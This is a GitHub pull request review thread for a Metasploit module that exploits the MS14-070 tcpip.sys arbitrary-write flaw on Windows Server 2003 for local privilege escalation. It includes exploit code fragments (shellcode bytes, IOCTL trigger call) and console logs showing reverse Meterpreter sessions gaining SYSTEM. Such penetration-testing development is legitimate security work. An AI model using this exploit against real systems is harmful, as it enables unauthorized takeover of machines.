New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Module ms14 070 #4664

Merged
merged 1 commit into from Feb 5, 2015

Conversation

Projects
None yet
5 participants

@zeroSteiner zeroSteiner self-assigned this Jan 29, 2015

end

handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
if handle.nil?

This comment has been minimized.

@OJ

OJ Jan 29, 2015

Contributor

unless handle is preferred.

p = payload.encoded
new_pid = create_proc

if new_pid.nil?

This comment has been minimized.

@OJ

OJ Jan 29, 2015

Contributor

unless new_pid :)


if new_pid.nil?
print_warning('Unable to create a new process.')
return

This comment has been minimized.

@OJ

OJ Jan 29, 2015

Contributor

This looks like another case for fail_with instead of print_warning followed by return.


session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE")

if not this_proc.memory.writable?(0x1000)

This comment has been minimized.

@OJ

OJ Jan 29, 2015

Contributor

unless this_proc.memory.writable?(0x1000)

if not this_proc.memory.writable?(0x1000)
vprint_error("Failed to allocate memory")
return nil
else

This comment has been minimized.

@OJ

OJ Jan 29, 2015

Contributor

else case not required thanks to the return nil on line 138.


unless is_system?
fail_with(Failure::Unknown, "The exploitation wasn't successful")
else

This comment has been minimized.

@OJ

OJ Jan 29, 2015

Contributor

else case not required as fail_with will exit.

this_proc.memory.write(0x38, "\x00\x00")
this_proc.memory.write(0x1100, buf)
this_proc.memory.write(0x2b, "\x00\x00")
this_proc.memory.write(0x2000, sc)

This comment has been minimized.

@OJ

OJ Jan 29, 2015

Contributor

Should any of these magic numbers be constants with more meaningful names? I see that 0x1100 is used a couple of times, so perhaps it'd be better to use a constant for this.

@OJ

This comment has been minimized.

Copy link
Contributor

OJ commented Jan 29, 2015

Nice submission! I see that @zeroSteiner has assigned himself, so I shall leave the PR in his very capable hands.

Cheers!


def initialize(info={})
super(update_info(info, {
'Name' => 'Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation',

This comment has been minimized.

@zeroSteiner

zeroSteiner Jan 29, 2015

Contributor

The module name could be a bit more meaningful. We try to not have target information included in them. Maybe something like tcpip.sys Arbitrary Write Privilege Escalation


register_options(
[
OptString.new('PID', [true, 'The target PID to elevate into', nil]),

This comment has been minimized.

@zeroSteiner

zeroSteiner Jan 29, 2015

Contributor

OptInt instead of OptString

This comment has been minimized.

@zeroSteiner

zeroSteiner Jan 29, 2015

Contributor

Also I'm not sure where this datastore option is referenced.


buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"

sc = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04"

This comment has been minimized.

@zeroSteiner

zeroSteiner Jan 29, 2015

Contributor

A disassembly of the shellcode in comments would be nice, so we understand what it is expected to do.

@KoreLogicSecurity

This comment has been minimized.

Copy link
Contributor

KoreLogicSecurity commented Jan 29, 2015

Thanks for the feedback @OJ & @zeroSteiner , updated.

major, minor, build, revision, branch = file_version(file_path)
vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")

if ("#{major}.#{minor}.#{build}" == "5.2.3790" && "#{revision}" < 5440)

This comment has been minimized.

@zeroSteiner

zeroSteiner Jan 29, 2015

Contributor

This seems to be raising an ArgumentError when I run the check method. revision should probably be converted to an integer (not a string) if it is not one already.

Example output:

msf-git (S:1 J:0) exploit(ms14_070_tcpip_ioctl) > check

[*] [2015.01.29-13:28:51] tcpip.sys file version: 5.2.3790.4573 branch: 45
[-] 192.168.90.142 - Check failed: ArgumentError comparison of String with 5440 failed
@zeroSteiner

This comment has been minimized.

Copy link
Contributor

zeroSteiner commented Jan 29, 2015

My initial test was kind of successful. After getting around the issue in the check method that I commented on above, a new elevated session is opened. However the original session that the exploit was run on died unexpectedly. I'll look into this a bit more later today.

Example output:

msf-git (S:1 J:0) exploit(ms14_070_tcpip_ioctl) > rexploit
[*] Reloading module...

[*] [2015.01.29-13:31:34] Started reverse handler on 192.168.5.10:4444 
[*] [2015.01.29-13:31:35] tcpip.sys file version: 5.2.3790.4573 branch: 45
[*] [2015.01.29-13:31:36] Injecting 281 bytes into 980 memory and executing it...
[*] [2015.01.29-13:31:36] Creating the thread to execute in 0x3c0000 (pid=980)
[*] [2015.01.29-13:31:36] Sending stage (770048 bytes) to 192.168.5.10
[*] [2015.01.29-13:31:36] Storing the shellcode in memory...
[*] Meterpreter session 2 opened (192.168.5.10:4444 -> 192.168.5.10:43090) at 2015-01-29 13:31:38 -0500
[*] [2015.01.29-13:31:38] Triggering the vulnerability...
[*] 192.168.90.142 - Meterpreter session 1 closed.  Reason: Died


^C[-] [2015.01.29-13:31:53] Exploit failed: Interrupt 
[-] [2015.01.29-13:31:53] Call stack:
REDACTED

meterpreter > sysinfo
Computer        : TEST-HTVDPU1HIG
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

print_status("Triggering the vulnerability...")
session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0)
session.railgun.kernel32.CloseHandle(handle)

This comment has been minimized.

@Meatballs1

Meatballs1 Jan 29, 2015

Contributor

Should wrap Lines 120 to 169 in a begin...ensure block so that the handle is closed if an exception is raised or we return early...

fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
end

print_status("Storing the shellcode in memory...")

This comment has been minimized.

@Meatballs1

Meatballs1 Jan 29, 2015

Contributor

Can you inject into the new process that has been created, or even a third process so that the original session is safe from crashes?

I guess not as opening the device handles in this process...

This comment has been minimized.

@OJ

OJ Feb 5, 2015

Contributor

+1 here. This would make it more in line with the way the other local exploits work. Is there much involved in either making open_device function in a more general manner or just emulating the functionality it contains so that it works in another process?

This comment has been minimized.

@zeroSteiner

zeroSteiner Feb 5, 2015

Contributor

@OJ since KoreLogicSecurity/metasploit-framework#1 was landed the exploit injects the payload into itself. The result is no new processes are created, one new session is opened and both the new session and the current session are elevated.

This comment has been minimized.

@OJ

OJ Feb 5, 2015

Contributor

Yeah I saw that mate, thanks. Do you think that it'd be a good idea to make it work in another process, so that it's consistent with the other local exploits?

This comment has been minimized.

@zeroSteiner

zeroSteiner Feb 5, 2015

Contributor

I misunderstood. IMO I don't think it's necessary. Most of the other local windows exploits that do not implement DLLs elevate themselves then execute the payload in a SYSTEM process, either by creating one or finding one.

@zeroSteiner

This comment has been minimized.

Copy link
Contributor

zeroSteiner commented Feb 5, 2015

@KoreLogicSecurity I got a chance to really look into this module. I'm proposing some changes to it that you can review in KoreLogicSecurity/metasploit-framework#1.

The primary purpose of the changes are to prevent the module from killing the session which runs it and then hanging.

@KoreLogicSecurity

This comment has been minimized.

Copy link
Contributor

KoreLogicSecurity commented Feb 5, 2015

Changes from @zeroSteiner looked great, merged into our fork, please land =)

@zeroSteiner

This comment has been minimized.

Copy link
Contributor

zeroSteiner commented Feb 5, 2015

Thanks @KoreLogicSecurity! Working as intended now:

msf-git (S:0 J:0) exploit(handler) > exploit

[*] [2015.02.05-18:29:37] Started reverse handler on 192.168.90.1:4444 
[*] [2015.02.05-18:29:38] Starting the payload handler...
[*] [2015.02.05-18:29:39] Sending stage (770048 bytes) to 192.168.90.142
[*] Meterpreter session 4 opened (192.168.90.1:4444 -> 192.168.90.142:1034) at 2015-02-05 18:29:41 -0500

meterpreter > sysinfo
Computer        : TEST-HTVDPU1HIG
OS              : Windows .NET Server (Build 3790, Service Pack 2).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > background 
[*] Backgrounding session 4...
msf-git (S:1 J:0) exploit(handler) > previous 
msf-git (S:1 J:0) exploit(ms14_070_tcpip_ioctl) > set SESSION -1
SESSION => -1
msf-git (S:1 J:0) exploit(ms14_070_tcpip_ioctl) > exploit

[*] [2015.02.05-18:29:54] Started reverse handler on 192.168.90.1:4444 
[*] [2015.02.05-18:29:56] tcpip.sys file version: 5.2.3790.4573 branch: 45
[*] [2015.02.05-18:29:56] Storing the shellcode in memory...
[*] [2015.02.05-18:29:57] Triggering the vulnerability...
[*] [2015.02.05-18:29:57] Checking privileges after exploitation...
[+] [2015.02.05-18:29:57] Exploitation successful!
[*] [2015.02.05-18:29:58] Creating the thread to execute in 0x1000000 (pid=2452)
[*] [2015.02.05-18:29:58] Sending stage (770048 bytes) to 192.168.90.142
[*] Meterpreter session 5 opened (192.168.90.1:4444 -> 192.168.90.142:1035) at 2015-02-05 18:29:59 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Landing this in just a minute after a minor change to the module description.

@zeroSteiner zeroSteiner merged commit 4fabe85 into rapid7:master Feb 5, 2015

1 check passed

continuous-integration/travis-ci The Travis CI build passed
Details

zeroSteiner added a commit that referenced this pull request Feb 5, 2015

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment